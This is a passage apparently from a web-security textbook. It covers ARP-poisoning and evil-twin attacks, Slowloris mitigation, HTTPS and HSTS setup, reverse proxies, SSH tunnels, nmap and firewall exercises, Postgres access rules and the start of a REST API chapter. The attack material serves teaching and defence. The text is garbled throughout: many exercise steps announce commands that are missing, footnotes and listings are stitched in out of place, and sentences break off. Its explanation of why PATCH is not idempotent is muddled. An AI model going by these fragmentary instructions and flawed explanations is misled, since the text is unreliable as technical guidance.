responds with enough packets that it floods out the legitimate response.
Consider Figure 5-4. The hacker is at address 192.168.0.101, on the same
switch as Alice. When Alice’s computer sends an ARP request for the
MAC address of 192.168.0.1, the hacker responds with their own MAC
address, claiming to be 192.168.0.1. If they send enough response packets,
Alice’s computer will send her requests to the hacker’s MAC address instead
of the gateway’s. The hacker can read them, alter them if they want, and
then forward them to the gateway.
When the response for 192.168.0.100 arrives at the gateway, and the
gateway makes an ARP request, the attacker again responds with their
MAC address. They receive the response and forward it to Alice.
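To see why flooding works, we can model an ARP cache as a simple lookup table. The following is a toy simulation rather than real networking code. The class name ArpCache and both MAC addresses are made up for illustration, and the sketch assumes the most recent reply simply overwrites the cached entry.

```python
class ArpCache:
    """Toy model of a host's ARP cache: IP address -> MAC address."""

    def __init__(self):
        self.table = {}

    def on_reply(self, ip, mac):
        # Simplifying assumption: every reply is accepted, and the
        # latest one overwrites whatever was cached before.
        self.table[ip] = mac

    def resolve(self, ip):
        return self.table.get(ip)


GATEWAY_IP = "192.168.0.1"
GATEWAY_MAC = "aa:aa:aa:aa:aa:01"   # hypothetical MAC of the real gateway
ATTACKER_MAC = "aa:aa:aa:aa:aa:99"  # hypothetical MAC of the attacker

alice = ArpCache()
alice.on_reply(GATEWAY_IP, GATEWAY_MAC)      # the legitimate reply
for _ in range(10):                          # the attacker's forged replies
    alice.on_reply(GATEWAY_IP, ATTACKER_MAC)

# Alice's traffic for the gateway now goes to the attacker's MAC address.
print(alice.resolve(GATEWAY_IP) == ATTACKER_MAC)
```

Nothing in the table records who sent a reply, which is why the forged entries are indistinguishable from the real one.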
This can be a surprisingly simple attack to construct. Reliable open
source software already exists. One example is Ettercap.7
7
www.ettercap-project.org
Figure 5-4. ARP poisoning MitM attack. The hacker spoofs both Alice
and the gateway
Attackers can also set up rogue access points. To see how these work,
imagine turning on the Wi-Fi Hotspot on your mobile device, removing
the password, and calling the network Starbucks. As many devices are
configured to automatically connect to a known Wi-Fi SSID, and many
devices have already connected to Starbucks in the past, someone’s phone
will likely connect to your Hotspot.
Now imagine you have your own rogue Wi-Fi access point running on
a laptop and it is configured to log all traffic. Again, open source software
exists, for example, Wifiphisher.8 Cheap hardware also exists such as
Hak5’s WiFi Pineapple. This is known as an Evil Twin attack.
Can a hacker get physical access to your wired network? An Ethernet
tap is a three-way Ethernet adapter that can be placed between a device
and the switch and can log traffic crossing it.
8
https://wifiphisher.org
9
https://github.com/codebutler/firesheep
5.4 Denial-of-Service Attacks
Denial of Service, or DoS, occurs when an attacker causes a service to
be unavailable for legitimate users. DoS attacks are often considered the
10
http://faceniff.ponury.net
Our default Apache setup for Coffeeshop is vulnerable to the Slowloris attack.
To see this, ensure the Coffeeshop and CSThirdparty VMs are running. From a
terminal window, run
cd django-coffeeshop/coffeeshop/vagrant
vagrant up
cd ../../csthirdparty/vagrant
vagrant up
vagrant ssh
https://github.com/gkbrk/slowloris
Note that your browser may cache the response, making it appear that the server
is responding. If you find this is the case, try loading the page with Curl instead.
vagrant ssh
Edit the file /etc/apache2/apache2.conf and add the following line (at
the end will do):
RequestReadTimeout header=5-20,minrate=20
This says to allow 5 seconds to receive the headers. If data are received,
increase the timeout by 1 second after each 20 received bytes, up to a limit of
20 seconds.
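The arithmetic behind these values can be sketched in a few lines of Python. This is only a model of the rule as described above, not Apache's implementation, and the function name header_timeout is our own.

```python
def header_timeout(bytes_received, initial=5, maximum=20, min_rate=20):
    """Seconds allowed for the request headers after bytes_received bytes."""
    extra = bytes_received // min_rate  # one extra second per min_rate bytes
    return min(maximum, initial + extra)


for n in (0, 100, 1000):
    print(n, header_timeout(n))
```

A client that sends nothing is cut off after 5 seconds, one that has sent 100 bytes has earned 10 seconds, and no client can stretch the limit beyond 20 seconds however slowly it trickles data.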
A similar timeout can be set for the body, but these values are sufficient to
protect against the aforementioned attack.
Rerun the slowloris command. This time you should find that your site
remains responsive.
QS_SrvMaxConnPerIP 50
Restart Apache, start slowloris, and confirm your site is still responsive. It
should be, even if you do not include the RequestReadTimeout line, because
QS_SrvMaxConnPerIP limits the number of connections from a single IP address to 50.
5.5 Setting Up HTTPS
The usual procedure for enabling HTTPS on your site is as follows:
For example:
vagrant ssh
cd /secrets/ssl
First, create a private key. This will be used for encryption when users visit our
site with HTTPS. The public key from it will go inside the certificate. We use
the same command we used in the exercise “RSA Encryption” in Chapter 4.
This creates a 2048-bit RSA key in a file coffeeshop.key. You should consider
this file a secret. A good practice is to make it owned and readable only by root.
Apache will still be able to read it as it starts with elevated privileges.
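One way to check the permissions from a script is sketched below. It assumes a POSIX filesystem, the helper name is_owner_only is ours, and it runs against a temporary stand-in file rather than the real key. It checks only the permission bits, not that the owner is root.

```python
import os
import stat
import tempfile


def is_owner_only(path):
    """Return True if group and others have no permissions on path."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return mode & (stat.S_IRWXG | stat.S_IRWXO) == 0


# Demonstrate on a temporary stand-in file rather than a real key.
with tempfile.NamedTemporaryFile(delete=False) as f:
    demo_path = f.name

os.chmod(demo_path, 0o644)
loose = is_owner_only(demo_path)   # readable by group and others

os.chmod(demo_path, 0o600)
tight = is_owner_only(demo_path)   # readable and writable by the owner only

os.remove(demo_path)
print(loose, tight)
```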
11
See https://blog.sean-wright.com/self-host-acme-server/
This will create a CSR called coffeeshop.csr. This would ordinarily be sent
to the CA to sign. However, we will sign it ourselves, with the same private key.
Enter the following command:
The last parameter points to a so-called extension file that contains extra
parameters needed by Chrome that the OpenSSL command line does not
provide. We will look at this later. The file already exists in the /secrets/ssl
directory.
Now install the certificate and private key somewhere where Apache can find
them. The default is /etc/ssl. We use ln -s rather than cp. We will discuss
why later.
We need to enable HTTPS in Apache and tell it where to find the key and
certificate. Enable the SSL module with
sudo cp /vagrant/apache2/000-default-ssl.conf \
/etc/apache2/sites-enabled/000-default.conf
Our server is ready to serve Coffeeshop over HTTPS, but no browser will trust
our certificate by default. For example, try the following curl command from within
the Coffeeshop VM:
curl https://10.50.0.2/
Notice the error. Now turn off validating the certificate with the --insecure
or -k flag:
This time Curl ignores the fact that it doesn’t trust the CA and displays the
response anyway (still encrypted with HTTPS).
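Python's standard ssl module draws the same distinction between verifying a certificate and merely encrypting the connection. The sketch below only builds the two configurations and makes no network connection. The variable names strict and lenient are ours.

```python
import ssl

# Default context: verifies the certificate chain and the hostname.
strict = ssl.create_default_context()

# Similar in spirit to curl's -k flag: encryption without verification.
# check_hostname must be disabled before verify_mode can be relaxed.
lenient = ssl.create_default_context()
lenient.check_hostname = False
lenient.verify_mode = ssl.CERT_NONE

print(strict.verify_mode == ssl.CERT_REQUIRED)
print(lenient.verify_mode == ssl.CERT_NONE)
```

As with curl -k, the lenient configuration is acceptable for experimenting with a self-signed certificate in a VM but should not be used against production services.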
Let’s tell Firefox to trust our certificate. Open Firefox on your host computer
and visit https://10.50.0.2. A warning similar to Figure 5-5 will appear.
Click Advanced to pop up the bottom panel as shown and click Accept the Risk
and Continue. The Coffeeshop site should display.
For Chrome, we need to manually add the certificate. Click on the three
vertical dots at the top-right corner of the window to open the menu and click
Settings. From the panel on the left, click Privacy and security, then Security,
then scroll down to see Manage certificates. Click on this.
The window that appears differs between Windows, Mac, and Linux. It is
shown in Figure 5-6 for Windows and Mac. In Windows, click on the Trusted
Root Certificate Authorities tab as shown and click the Import... button. In
Linux, click on the Authorities tab and click the Import button. On Mac, just
click the + or pencil button.
Browser Requirements for Self-Signed Certificates
Browsers implement varying levels of security regarding self-signed
certificates. Firefox allows the user to add an exception, allowing the site to
be visited. It still flags the site as unsafe but does use encryption.
Chrome, as we saw in the previous exercise, does not allow the user to
add an exception, and the certificate must be manually added. It also requires
a Subject Alternative Name (SAN) to be added to the certificate. This is a
way of specifying multiple domain names and/or IP addresses in the same
certificate. Even if we have only one IP address or domain name, Chrome still
requires a SAN record. We included the details in the v3.ext file as OpenSSL
does not support these parameters on the command line. If you look at the
file, you will see we added the SAN record for our site by IP address.
basicConstraints=CA:FALSE
keyUsage = digitalSignature, nonRepudiation, keyEncipherment, dataEncipherment
subjectAltName = @alt_names
[alt_names]
IP.1 = 10.50.0.2
Permanent Redirects
In the last exercise, we configured Apache to serve our site over both HTTP
and HTTPS. We saw in Section 5.3 that this introduces an SSL stripping
vulnerability. The solution is to issue a 301 Moved Permanently redirect for
all traffic from HTTP to HTTPS. This prevents the server from serving content
over HTTP. This is better than a 302 Found response as the latter is not
https://hstspreload.org
and registering your domain. So that only the owner of a domain can do
this, you must also extend the HSTS header in your server's responses as
follows:
Strict-Transport-Security: max-age=large-number;
includeSubDomains; preload
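Once your domain is in the registry, keep the preload keyword in the
header: the registry expects listed sites to keep meeting its submission
requirements, and a site that drops the keyword becomes eligible for removal.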
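The header value is simple enough to assemble by hand. The helper below is a minimal sketch with a name of our choosing (hsts_header), and one year is an assumed choice for the large max-age.

```python
def hsts_header(max_age, include_subdomains=True, preload=False):
    """Build the value of a Strict-Transport-Security header."""
    parts = [f"max-age={max_age}"]
    if include_subdomains:
        parts.append("includeSubDomains")
    if preload:
        parts.append("preload")
    return "; ".join(parts)


ONE_YEAR = 365 * 24 * 60 * 60  # 31536000 seconds, an assumed "large number"
print(hsts_header(ONE_YEAR, preload=True))
```

In a Django project, you would not normally build the string yourself: the SECURE_HSTS_SECONDS, SECURE_HSTS_INCLUDE_SUBDOMAINS, and SECURE_HSTS_PRELOAD settings instruct Django's security middleware to add the header.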
Listing 5-2 shows how to modify the site configuration file to perform
a permanent redirect for a site example.com. You will need to load the
mod_alias module with
<VirtualHost *:80>
ServerName example.com
ServerAlias www.example.com
Redirect permanent / https://example.com/
</VirtualHost>
<VirtualHost *:443>
ServerName example.com
ServerAlias www.example.com
SSLEngine on
...
The equivalent for Nginx is shown in Listing 5-3. Lines 3 and 10 are
for IPv6.
server {
    listen 80 default_server;
    listen [::]:80 default_server;
    server_name example.com www.example.com;
    return 301 https://$host$request_uri;
}

server {
    listen 443 ssl http2 default_server;
    listen [::]:443 ssl http2 default_server;
    server_name example.com www.example.com;
    ...
}
• Load balancing
Figure 5-8. Reverse proxy tunnelling traffic to a REST API (left) and
an application server (right)
<VirtualHost *:80>
    ServerName coffeeshop.com
    ServerAlias www.coffeeshop.com
    Redirect permanent / https://coffeeshop.com/
</VirtualHost>
<VirtualHost *:443>
    ServerName coffeeshop.com
    ServerAlias www.coffeeshop.com
    ProxyPass / http://192.168.0.3/
    ProxyPassReverse / http://192.168.0.3/
    SSLEngine on
    ...
</VirtualHost>
server {
    listen 443 ssl http2 default_server;
    listen [::]:443 ssl http2 default_server;
    server_name coffeeshop.com www.coffeeshop.com;
    location /api {
        proxy_set_header Host $host:$server_port;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_pass http://192.168.0.2:5000;
        proxy_redirect http://192.168.0.2:5000/ /api;
    }
    location / {
        proxy_set_header Host $host:$server_port;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_pass http://192.168.0.3;
        proxy_redirect http://192.168.0.3/ /;
    }
}
SSH Tunnels
HTTPS only provides encryption for HTTP. It cannot be used, for example,
to encrypt database connections.
Many other protocols, for example, the Postgres protocol, also offer
encryption. For protocols that do not, SSH tunnels can be used.
An SSH tunnel, otherwise known as SSH port forwarding, wraps an
arbitrary TCP/IP protocol in an encrypted SSH connection. There are
two types: local forwarding and remote forwarding. In both cases, a
port is opened to listen for connections. Upon connection, a tunnel is
established and used to forward packets to the target port and host.
Figure 5-9 shows an example of local port forwarding. The SSH server
daemon is running on host ssh.remote.net. The developer wants to
establish a secure connection to Postgres running on port 5432 of host
db.remote.net. They pick a host local to them that they can run an SSH
client on. This may be localhost. In our example, it is client.remote.net.
They pick a local port: in our example, 8080. They use the SSH client to
connect to the SSH daemon running on ssh.remote.net. When they
connect to port 8080 on client.remote.net, say, with the psql command,
the Postgres packets will be wrapped in SSH and sent to ssh.remote.net,
which will unwrap them and send them on to the database server,
db.remote.net, on port 5432.
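The pieces of this example map directly onto the arguments of the OpenSSH client's -L option, which takes the form local_port:target_host:target_port. The sketch below only builds the command line and does not run it. The function name local_forward_command is ours.

```python
def local_forward_command(local_port, target_host, target_port, ssh_host, user=None):
    """Build the argument list for an SSH local port forward."""
    destination = f"{user}@{ssh_host}" if user else ssh_host
    return [
        "ssh",
        "-N",  # do not run a remote command, only forward ports
        "-L", f"{local_port}:{target_host}:{target_port}",
        destination,
    ]


cmd = local_forward_command(8080, "db.remote.net", 5432, "ssh.remote.net")
print(" ".join(cmd))
```

The resulting list could be passed to subprocess.run to open the tunnel from a script, assuming key-based authentication is already set up for the SSH host.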
Again, traffic between the SSH client host and the database host is not
encrypted. A common application is allowing outside access to a service
on a local host, for example, a desktop computer, which does not have a
public IP address.
We will create an SSH tunnel with local port forwarding so that the Postgres
server running on the Coffeeshop VM can be securely connected to from the
CSThirdparty VM.
Each VM has an account called dbuser. The password is disabled, so the only
way to connect to it is with Sudo.
vagrant ssh
Now, in both VMs, change to the dbuser user. Passwords are disabled, so we
will have to use Sudo. Do this with the following command in each VM:
sudo su - dbuser
ssh-keygen
cat ~dbuser/.ssh/id_rsa.pub
mkdir -p ~/.ssh
chmod 700 ~/.ssh
nano ~/.ssh/authorized_keys
substituting your favorite Linux editor for nano. Paste the copied public key
from the clipboard into this file, save it, and exit the editor.
We need to change the file permissions:
chmod 600 ~/.ssh/authorized_keys
Test if SSH works by running the following from the CSThirdparty VM (still
as dbuser). You will have to confirm you want to add 10.50.0.2 to the list of
known hosts.
ssh 10.50.0.2
but the connection may have nonetheless been established. You can confirm
this with
Once the connection is established, you can use this to connect to Postgres on
the Coffeeshop VM (from the CSThirdparty VM) with
echo $DBOWNERPWD
When you have finished, find the process ID (PID) of the SSH tunnel with
ps x
kill PID
5.7 Server Configuration
Hiding Service Details
We looked at hiding hostnames and ports behind a reverse proxy in the
last section. This is good practice because it reduces your attack surface,
especially if the back-end hosts are behind a firewall.
Hackers learn about their target systems by performing
reconnaissance. One open source tool for this is nmap, which probes hosts
and their open ports. We will not discuss nmap in much detail, but one
If an attacker knows the name and version of a service you are running,
they can look up its known vulnerabilities. Vulnerability databases are
listed in Chapter 14.
You can reduce the information that nmap and similar tools can
obtain by
Banners are text that a service displays when it is connected to. For
example, you can see that the web server is Apache, and which version it
is, by running the command
curl -I http://10.50.0.2
from inside one of your VMs. Look for the Server: line.
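The same check is easy to automate. The sketch below extracts the banner from a block of response headers. The sample headers are hypothetical, including the version string, and the function name server_banner is ours.

```python
def server_banner(raw_headers):
    """Return the value of the Server header, or None if it is absent."""
    for line in raw_headers.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            return value.strip()
    return None


# Hypothetical output of curl -I; the version string is made up.
sample = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
)
print(server_banner(sample))
```

An attacker's reconnaissance tools do essentially this across many hosts, which is why trimming the banner is worthwhile.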
For Apache, the version number (but not the fact that it is Apache) can
be hidden in configuration. Edit the /etc/apache2/conf-enabled/security.conf
file and change
ServerTokens OS
to
ServerTokens Prod
and
ServerSignature On
to
ServerSignature Off
Host Firewalls
Firewalls protect ports for whole networks or subnets. A host firewall runs
on a host and protects just that host’s ports. Ubuntu comes with ufw, which
stands for uncomplicated firewall. ufw controls Netfilter, a kernel-level
framework for packet filtering. It is enabled with
You can also delete rules by line number. To see the line numbers, type
USING NMAP
We will use nmap to see what it reveals about our Coffeeshop VM, make some
changes with ufw, and then see how it affects nmap’s output.
Make sure both your VMs are running with vagrant up, and then connect to
the Coffeeshop VM with vagrant ssh from Coffeeshop’s vagrant directory.
In another window, connect to the CSThirdparty VM with vagrant ssh from
CSThirdparty’s vagrant directory.
You should see that ports 22, 25, 80, 443, 1080, and 5432 are open.
Now go to the Coffeeshop VM. We will allow SSH, HTTP, and HTTPS from
anywhere. We will disable everything else. Enter the following ufw commands:
Now return to the CSThirdparty VM and run nmap again. This time it should
only report ports 22, 80, and 443.
Before finishing the exercise, disable the Coffeeshop firewall again as we will
need these ports open in later exercises.
If you like, you can repeat the nmap command with OS and service
fingerprinting enabled:
TCP Wrappers
ufw is a kernel-level firewall. TCP Wrappers (named in the plural) provides
application-level filtering. Applications support TCP Wrappers by linking
against its library, libwrap.a or libwrap.so. Configuration is in the files
/etc/hosts.allow and /etc/hosts.deny.
The /etc/hosts.allow and /etc/hosts.deny files consist of lines in
the form
sshd : 192.168.0.*
ALL : 170.20.10.10
ALL : ALL
Hiding Errors
When developing a web application, we need to see errors. Django and
other WAFs can display back-end errors and stack traces in the web page,
aiding the development process.
However, if left in production systems, error messages can give away
details that help attackers find vulnerabilities.
Figure 5-11 shows an example of Django’s default debugging output.
It is produced by the URL http://10.50.0.2/pagewitherror in your
VM. Visit this URL and scroll through the error message. Included in this
output is
DEBUG = False
ADMINS = [("Coffeeshop Admin", "[email protected]")]
LOGGING = {
    "version": 1,
    "disable_existing_loggers": False,
    "handlers": {
        "console": {
            "class": "logging.StreamHandler",
        },
    },
    "loggers": {
        "django": {
            "handlers": ["console"],
            "level": "INFO"
        },
    },
}
For more details about the LOGGING variable, see the Django
documentation.12 We will look more at Django logging in Chapter 12.
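By default, Django hands the LOGGING dictionary to Python's standard logging.config.dictConfig function, so the structure can be tried out without Django at all. The following sketch does exactly that with a condensed copy of the dictionary. The two log messages are our own.

```python
import logging
import logging.config

LOGGING = {
    "version": 1,
    "disable_existing_loggers": False,
    "handlers": {"console": {"class": "logging.StreamHandler"}},
    "loggers": {"django": {"handlers": ["console"], "level": "INFO"}},
}

# Apply the configuration by hand, as Django would at startup.
logging.config.dictConfig(LOGGING)

logger = logging.getLogger("django")
logger.info("shown: INFO meets the configured level")
logger.debug("hidden: DEBUG is below the configured level")
print(logger.getEffectiveLevel() == logging.INFO)
```

A mistake in the dictionary, such as a logger that names a handler that does not exist, raises an exception when dictConfig is called, which makes this a quick way to validate changes.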
12
https://docs.djangoproject.com/en/3.2/topics/logging/
Recall from Chapter 4 that a web server returns a 404 Not Found
response code when a requested URL is not found. The text in the body of
the response can be configured by your web server or WAF.
Similarly, an error executing back-end code returns a default 500
Server Error page.
Both of these can be overridden to give friendlier yet vaguer errors
about what went wrong. In Django, we do this by adding handlers in the
views.py file. This is illustrated in Listing 5-6. We then set the default
handlers to these functions by adding two lines to the urls.py file. This is
shown in Listing 5-7.
handler404 = views.handler404
handler500 = views.handler500
ERROR HANDLING
It doesn’t matter what email address you enter—they are all caught by
MailCatcher. Now visit the preceding URL again and notice the error is no
longer displayed. Visit MailCatcher’s console by pointing your browser at
http://10.50.0.2:1080/. You should see the full error details in the email
sent to the address you specified.
Don’t forget you have to restart Apache first with
coffeeshopsite/coffeeshop/templates
Default Passwords
Routers, access points, webcams, and IoT devices often come with default
passwords. The same is often true of WAFs and web servers, especially
admin consoles and those designed for embedded applications. Database
servers often also have default passwords or absent passwords.
It can be easy to forget to change these, and fortunately for hackers,
tools exist to find services where this has not been done.
Shodan at https://shodan.io is one such service. Figure 5-12 shows
a (redacted) screenshot of a Shodan search for services running on port
8081 with username admin and password password. As can be seen, there
were many matches, and the first three at least returned a 200 OK response.
Looking at the Top Products section at the left of the image, we see the
most common responses were from TP-LINK devices, presumably routers,
but also a fair number of Nginx, Apache, and Microsoft IIS web servers.
Django does not preinstall any accounts, admin or otherwise, and
developers must create them explicitly. Default passwords are therefore
less of an issue.
We will say more about password management in Chapter 9.
5.8 Database Configuration
Web applications often use databases to persist data. If misconfigured,
vulnerabilities can be introduced. In this section, we focus on the
configuration of the database server itself. For SQL injection vulnerabilities
arising from application code, see Chapter 7.
Postgres Configuration
Postgres has its own configuration for controlling which users can
log in from what hosts and with which authentication methods. The
configuration files are
• postgresql.conf
• pg_hba.conf.
listen_addresses = '*'
#listen_addresses = 'localhost'
• TYPE
• DATABASE
• USER
• ADDRESS
• AUTH-METHOD
• Optionally, AUTH-OPTIONS
The TYPE column can be local for local connections or host for TCP/
IP connections (either IPv4 or IPv6). It can also be hostssl to accept only
TLS/SSL-encrypted connections or hostnossl to accept only connections
without TLS/SSL. There are also hostgssenc and hostnogssenc for with
and without GSSAPI encryption (which we do not discuss in the book).
The DATABASE field is the name of a database or all for all databases.
The USER field is the Postgres (not OS) user or all for all users.
The ADDRESS field is either a hostname, IP address range (IPv4 or IPv6),
or all. A hostname can be preceded by a dot, for example, .coffeeshop.com,
in which case anything ending in that domain is accepted.
An IPv4 address is the regular four-part address followed by a slash
/ and then a CIDR mask length (the number of bits from the left to treat
as the subnet). For example, 10.50.10.0/24 would match any IP address
beginning in 10.50.10. The address range 127.0.0.1/32 matches only
127.0.0.1.
IPv6 address ranges are similar, but with the colon-separated notation
instead of dot separated. The address range ::1/128 is the IPv6 equivalent
of 127.0.0.1/32.
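If you are unsure which addresses a range covers, Python's standard ipaddress module can check it for you. The sketch below illustrates the CIDR arithmetic only and is not how Postgres itself evaluates pg_hba.conf. The test addresses are arbitrary.

```python
import ipaddress

subnet = ipaddress.ip_network("10.50.10.0/24")
print(ipaddress.ip_address("10.50.10.7") in subnet)   # True
print(ipaddress.ip_address("10.50.11.7") in subnet)   # False

loopback4 = ipaddress.ip_network("127.0.0.1/32")
print(loopback4.num_addresses)                         # 1

loopback6 = ipaddress.ip_network("::1/128")
print(ipaddress.ip_address("::1") in loopback6)        # True
```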
The AUTH-METHOD field is the authentication method. A full list is in the
Postgres documentation at www.postgresql.org/docs/12/auth-pg-hba-conf.html,
but some common ones are the following:
POSTGRES PERMISSIONS
In this exercise, we will experiment with the Postgres pg_hba.conf file in the
Coffeeshop VM.
vagrant ssh
echo $DBOWNERPWD
Now switch to the Coffeeshop VM and edit the pg_hba.conf file, for example:
allows MD5-based password login from any host. Remove or comment out
this line and save the file. Restart Postgres with
Edit the pg_hba.conf file again and add a line to allow connections from any
host starting with 10.50.0. Restart the server and test if you can connect
again from CSThirdparty.
13
https://pgadmin.org
5.9 Securing the Filesystem
We intentionally expose part of the filesystem so that
• Users can view files from the public HTML path (HTML
files, media, JavaScript, etc.) through a web browser
DocumentRoot /var/www/html
<Directory />
Options FollowSymLinks
AllowOverride None
Require all denied
</Directory>
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
<Directory /var/www/>
Options FollowSymLinks
AllowOverride None
Require all granted
</Directory>
Note that these directories are not exposed to web clients by default:
the <Directory> tag only defines what the server can access, but they
are still inaccessible via a browser unless mapped to a URL. We do this by
using the DocumentRoot tag or an Alias tag in the site configuration file.
For example, we have the following in our Coffeeshop VM:
Alias /static/ /var/www/coffeeshopsite/coffeeshop/static/
Figure 5-13. Shodan being used to find sites that allow directory
listing on /. IP addresses have been redacted
Any directories that are in the public path should either have an
index.html file or else the directive Options -Indexes should be included
in the <Directory> block. If it is not, then the user will be able to perform
a directory listing, viewing the directory’s contents. This can expose
vulnerabilities. We looked at Shodan in Section 5.7. Figure 5-13 shows the
output of a Shodan query to find sites that allow directory listing of /.
Make sure that any files that are not part of your application, for example,
old files that are no longer used, are also not in the public path.
HTML, CSS, media, PHP, and JavaScript files can be found by attackers
even if there are no links to them by using brute-force tools such as
Dirbuster.14
This is also true of URLs, such as REST API calls, that are no longer
needed for the application and development-related directories such as
.git. Be sure to delete debugging URLs from production systems.
Code Directories
Of course, web applications usually contain code. Web servers should be
configured to only serve code by executing it, not displaying it as plain
text. If users can see the code, they may discover vulnerabilities they can
exploit.
The original way of serving code from a web server is to put
executables or scripts in a cgi-bin directory. This is configured in
Apache with a ScriptAlias directive, or with a <Directory> block containing
Options +ExecCGI. If cgi-bin directories are used, care should
be taken that the <Directory> block is set up correctly so that the files
cannot be served as plain text. We won’t discuss CGI further as we usually
use frameworks such as Django with WSGI to execute our code, and CGI is
a rather outdated technology.
Our application uses the WSGI module to serve Python code. The site
configuration file maps our WSGI application to the URL / with the line
WSGIScriptAlias / /var/www/coffeeshopsite/coffeeshopsite/wsgi.py
14
https://sourceforge.net/projects/dirbuster/
Upload Directories
Sometimes, a directory has to be writable so that users can upload files, for
example, uploading images on social media sites. Allowing users to change
the content on your site can introduce vulnerabilities. The following
principles reduce the risk:15
15
www.opswat.com/blog/file-upload-protection-best-practices
WSGIScriptAlias / /var/www/coffeeshopsite/coffeeshopsite/wsgi.py
Alias /static/ /var/www/coffeeshopsite/coffeeshop/static/
Secrets
Web applications contain some files with particularly sensitive data, for
example:
• Database passwords
• Private keys
SECRET_KEY = os.environ['SECRET_KEY']
5.10 Summary
In this chapter, we looked at how to make our servers and the services that
run on them secure: web servers, databases, and other TCP/IP services.
We looked at how hackers launch man-in-the-middle attacks and how
HTTPS helps prevent them.
Not all protocols come with encryption. We looked at two ways to wrap
unencrypted protocols in an encrypted connection: reverse proxies (using
TLS/SSL) and SSH tunnels.
Our applications often contain services that are only needed internally
and should not be exposed outside our local network. We looked at two
ways of blocking access to ports: host firewalls and TCP Wrappers.
Finally, we learned how to use database permissions to restrict access
based on IP address, and we looked at techniques for making our servers’
filesystems secure.
In the next chapter, we begin looking specifically at developing web
applications, starting with designing our APIs and endpoints.
CHAPTER 6
APIs and Endpoints
In this chapter, we will begin looking at coding web applications, starting
with designing our endpoints: URLs and APIs. These are the building
blocks of a web application. HTTP leaves a number of choices to us: what
request method to use, what response code to return, what format to use
for the request and response body.
We will begin by looking at the anatomy of a URL before exploring
REST APIs. These are a specific type of API that leverages the HTTP
protocol to enable stateless requests to server-side functionality.
A key method for restricting access to server-side functionality is
username and password-based authentication. We will begin looking at
this topic in this chapter (it is covered more fully in Chapter 10) as well as
how to use unit testing to ensure permissions are set up correctly.
We finish the chapter by looking at some specific attacks that exploit
vulnerabilities in APIs: deserialization attacks.
6.1 URLs
The general form of a URL is
scheme://user:password@host:port/path?query#fragment
All parts are optional except path. If path begins with a slash / (and
has to if host is present in the URL), then it is an absolute path; otherwise,
it is relative to the URL it is loaded from.
The fragment (the part after the #) is not sent to the server but is applied
by the browser. The username and password are placed in a header, which we
discuss in Chapter 10.
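Python's standard urllib.parse module splits a URL into these components. The URL in this sketch is hypothetical and was chosen so that every part is present.

```python
from urllib.parse import urlsplit

# Hypothetical URL containing every component.
url = "https://alice:s3cret@www.example.com:8443/addresses/100?format=json#top"
parts = urlsplit(url)

print(parts.scheme)    # https
print(parts.username)  # alice
print(parts.password)  # s3cret
print(parts.hostname)  # www.example.com
print(parts.port)      # 8443
print(parts.path)      # /addresses/100
print(parts.query)     # format=json
print(parts.fragment)  # top
```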
If HTTPS is used, the HTTP request itself is encrypted, including the path,
query parameters, username, and password. Only the host and port are visible
on the network, as they are needed to establish the connection.
Despite this, we should not send sensitive data in a GET request. The
reasons are as follows:
6.2 REST APIs
REST APIs (REST stands for Representational State Transfer) provide users
and applications with programmatic access to functionality. Rather than
returning HTML pages, they return data, serialized for transport in some
way, for example, as JSON or XML.
REST APIs are no different from regular HTTP requests other than the
data type of the body. The same HTTP methods are used (GET, POST, PUT,
etc.) as well as the same response codes (200 OK, 404 Not Found, etc.).
A common misconception is that the term “REST” applies to any API that allows
programmatic access to the application over HTTP. However, REST APIs
conform to specific principles and build on the existing meanings of the
HTTP methods and response codes.
By keeping to the correct REST principles, we avoid some common
vulnerabilities. Also, we can use frameworks that take care of the
mechanics of REST, allowing us to focus on business logic. We write less
code, and it is clearer. As we have already seen, less code means fewer
vulnerabilities, and clearer code means we are more likely to spot them.
REST APIs operate on items and collections. An item is a single
entity, such as an address. A collection is a group of items, such as an
address book.
GET Requests
REST GET requests can be called on an item, for example:
http://api.example.com/addresses/100
or on a collection, for example:
http://api.example.com/addresses
The return status should be 200 OK if the requested item exists, with
the item or collection in the body, and 404 Not Found otherwise.
POST Requests
POST is for creating an item. It is therefore only called on collections. It is
not idempotent: if you call it more than once, a new item will be created
each time. It should not be cached.
Returning a response body is optional. You may return the ID of
the newly created item, in which case the response code should be 201
Created or 200 OK. If you do not return the ID or item, return a response
code 204 No Content.
PUT Requests
PUT is for updating an existing item. It is therefore only called on an item.
PUT requests are not cached. To see why, imagine you update a record, say,
an address, using PUT. Then, another user updates the same record. If you
want to change it back, you would issue the same PUT request as before. If
it were cached, it would not execute on the server.
PUT is regarded as idempotent, as calling it multiple times has the same
effect as calling it once. It should return 200 OK if the response contains the ID or item, 204
No Content if it does not, or 404 Not Found if the record does not exist.
PATCH Requests
PATCH, like PUT, updates a record, so it is called on an item. However, PUT
is a full update, whereas PATCH is a partial update. You only supply PATCH
with the data that are changing, not the whole record.
Unlike PUT, PATCH is not idempotent. To see why, imagine we have the
following address in our database:
Column Value
Say we use PATCH to set the postcode to 60600. If we use JSON, the
request might look like
{
"Postcode": "60600"
}
Column Value
Now imagine another user changes the state to OR and we make our
PATCH call again to set the postcode to 60600. Now the record is
Column Value
Our two PATCH requests do not result in the same state in the database,
so PATCH is not idempotent.
This is not the case with PUT, as we supply all the fields of the record in the request.
PATCH should return 200 OK if the response contains the ID or item, 204
No Content if it does not, or 404 Not Found if the record does not exist.
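The difference can be sketched with plain dictionaries standing in for database rows. The starting address and the put() and patch() helpers are hypothetical; they only model a full and a partial update.

```python
def put(record, new_record):
    """Full update: the stored record is replaced by the one supplied."""
    return dict(new_record)


def patch(record, changes):
    """Partial update: only the supplied fields are changed."""
    updated = dict(record)
    updated.update(changes)
    return updated


# Hypothetical starting record
address = {"City": "Chicago", "State": "IL", "Postcode": "60601"}

# Our first PATCH sets the postcode
after_first_patch = patch(address, {"Postcode": "60600"})

# Another user changes the state, then we repeat our PATCH
after_other_user = patch(after_first_patch, {"State": "OR"})
after_second_patch = patch(after_other_user, {"Postcode": "60600"})
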